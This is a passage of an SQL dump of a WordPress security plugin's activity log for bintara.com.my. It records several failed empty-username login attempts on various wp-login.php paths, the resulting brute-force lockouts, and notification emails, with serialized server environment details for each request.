14:34:44',18157088,19645272,'https://bintara.com.my/blog/wp-login.php',1,0,'60.245.60.151'),(26316,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:34:44\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:34:44\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:34:44\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:34:44\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:34:45','2019-09-21 14:34:44',18241888,19645272,'https://bintara.com.my/blog/wp-login.php',1,0,'60.245.60.151'),(26317,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:34:45','2019-09-21 14:34:44',18448416,19645272,'https://bintara.com.my/blog/wp-login.php',1,0,'60.245.60.151'),(26318,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY1EXkXpgmG5P@iB8k-dAAAAII\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"149.210.150.57\";s:11:\"REMOTE_PORT\";s:5:\"53290\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY1EXkXpgmG5P@iB8k-dAAAAII\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569076497.626\";s:12:\"REQUEST_TIME\";s:10:\"1569076497\";}}','notice','2019-09-21 14:34:59','2019-09-21 14:34:58',18158688,19645848,'https://bintara.com.my/wordpress/wp-login.php',1,0,'149.210.150.57'),(26319,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:34:58\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:34:58\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:34:58\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:34:58\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:34:59','2019-09-21 14:34:58',18243536,19645848,'https://bintara.com.my/wordpress/wp-login.php',1,0,'149.210.150.57'),(26320,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:34:59','2019-09-21 14:34:58',18450304,19645848,'https://bintara.com.my/wordpress/wp-login.php',1,0,'149.210.150.57'),(26321,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY1KXkXpgmG5P@iB8k-hwAAAIM\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"107.189.2.90\";s:11:\"REMOTE_PORT\";s:5:\"52506\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY1KXkXpgmG5P@iB8k-hwAAAIM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076522.0476\";s:12:\"REQUEST_TIME\";s:10:\"1569076522\";}}','notice','2019-09-21 14:35:23','2019-09-21 14:35:22',18156200,19645536,'https://bintara.com.my/wp/wp-login.php',1,0,'107.189.2.90'),(26322,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:35:22\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:35:22\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:35:22\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:35:22\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:35:23','2019-09-21 14:35:22',18240848,19645536,'https://bintara.com.my/wp/wp-login.php',1,0,'107.189.2.90'),(26323,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:35:23','2019-09-21 14:35:22',18447112,19645536,'https://bintara.com.my/wp/wp-login.php',1,0,'107.189.2.90'),(26324,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY1enkXpgmG5P@iB8k-xgAAAJM\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"51.75.160.132\";s:11:\"REMOTE_PORT\";s:5:\"55780\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY1enkXpgmG5P@iB8k-xgAAAJM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076602.2166\";s:12:\"REQUEST_TIME\";s:10:\"1569076602\";}}','notice','2019-09-21 14:36:43','2019-09-21 14:36:42',18158768,19647864,'https://bintara.com.my/test/wp-login.php',1,0,'51.75.160.132'),(26325,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:36:42\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:36:42\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:36:42\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:36:42\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:36:43','2019-09-21 14:36:42',18243688,19647864,'https://bintara.com.my/test/wp-login.php',1,0,'51.75.160.132'),(26326,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:36:43','2019-09-21 14:36:42',18451496,19647864,'https://bintara.com.my/test/wp-login.php',1,0,'51.75.160.132'),(26327,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY1fnkXpgmG5P@iB8k-ygAAAI4\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"124.217.235.99\";s:11:\"REMOTE_PORT\";s:5:\"52728\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY1fnkXpgmG5P@iB8k-ygAAAI4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076606.5091\";s:12:\"REQUEST_TIME\";s:10:\"1569076606\";}}','notice','2019-09-21 14:36:47','2019-09-21 14:36:46',18158752,19647216,'https://bintara.com.my/blog/wp-login.php',1,0,'124.217.235.99'),(26328,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:36:46\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:36:46\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:36:46\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:36:46\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:36:47','2019-09-21 14:36:46',18243472,19647216,'https://bintara.com.my/blog/wp-login.php',1,0,'124.217.235.99'),(26329,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:36:47','2019-09-21 14:36:46',18450352,19647216,'https://bintara.com.my/blog/wp-login.php',1,0,'124.217.235.99'),(26330,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY10HkXpgmG5P@iB8k-8wAAAJI\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"185.80.92.123\";s:11:\"REMOTE_PORT\";s:5:\"55040\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY10HkXpgmG5P@iB8k-8wAAAJI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076688.1625\";s:12:\"REQUEST_TIME\";s:10:\"1569076688\";}}','notice','2019-09-21 14:38:09','2019-09-21 14:38:08',18159520,19648936,'https://bintara.com.my/blog/wp-login.php',1,0,'185.80.92.123'),(26331,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY18XkXpgmG5P@iB8lAAwAAAIY\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"80.211.2.59\";s:11:\"REMOTE_PORT\";s:5:\"49934\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY18XkXpgmG5P@iB8lAAwAAAIY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076721.9149\";s:12:\"REQUEST_TIME\";s:10:\"1569076721\";}}','notice','2019-09-21 14:38:43','2019-09-21 